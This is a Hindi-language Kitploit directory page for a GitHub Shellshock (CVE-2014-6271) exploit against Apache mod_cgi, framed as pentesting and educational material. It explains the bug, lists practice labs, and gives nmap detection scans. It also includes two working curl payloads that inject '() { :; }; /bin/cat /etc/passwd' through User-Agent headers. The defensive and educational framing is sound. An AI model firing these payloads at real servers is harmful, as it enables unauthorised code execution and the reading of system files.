Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2014-6271 — "शेलशॉक" भेद्यता का शोषण। Apache में mod_cgi के साथ दूरस्थ कोड निष्पादन। | Kitploit
उपकरण/GitHubGitHub/j0hnth3kn1ght/cve-2014-6271
टोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubj0hnth3kn1ght/cve-2014-6271

CVE-2014-6271

"शेलशॉक" भेद्यता का शोषण। Apache में mod_cgi के साथ दूरस्थ कोड निष्पादन।

रिपॉजिटरी देखें
51 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

शेलशॉक शोषण (CVE-2014-6271)

शेलशॉक प्रभावी रूप से BASH में एक रिमोट कमांड एक्सीक्यूशन भेद्यता है। यह स्क्रिप्ट mod_cgi सक्षम apache या समान वेब वातावरण में इस भेद्यता का शोषण करती है। यह भेद्यता पर्यावरण चर (environment variables) के हेरफेर में निहित है, जो डायनामिक नामित मान होते हैं जो कंप्यूटर पर प्रक्रियाओं के चलने के तरीके को प्रभावित करते हैं। हमलावर पर्यावरण चर में दुर्भावनापूर्ण कोड जोड़कर इसका शोषण कर सकते हैं, जो चर प्राप्त होने पर निष्पादित होता है। इससे हमलावर सिस्टम से समझौता कर सकते हैं।

भेद्यता परीक्षण के लिए लैब

  • PentesterLab

  • VulnHub

  • TryHackMe

    Vídeo2

CGI-BIN पृष्ठ खोजें:

root@kitploit:~
$ nmap 192.168.x.x --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi
$ nmap -sV -p- --script http-shellshock 192.168.x.x
$ nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls 192.168.x.x

मैन्युअल परीक्षण:

root@kitploit:~
sudo curl -H "User-Agent: () { :; }; /bin/cat /etc/passwd" <WEBSERVER-IP>
sudo curl -A "() { :;}; echo Content-Type: text/html; echo; /bin/cat /etc/passwd;" <WEBSERVER-IP>

चेतावनी:

मैं इस उपकरण के कारण होने वाले किसी भी अवैध उपयोग या क्षति के लिए जिम्मेदार नहीं हूँ। यह मज़े के लिए लिखा गया था, बुराई के लिए नहीं, और हैकिंग और साइबर सुरक्षा के बारे में जागरूकता बढ़ाने के लिए है।

शुभ हैकिंग :)

टूल डाउनलोड करें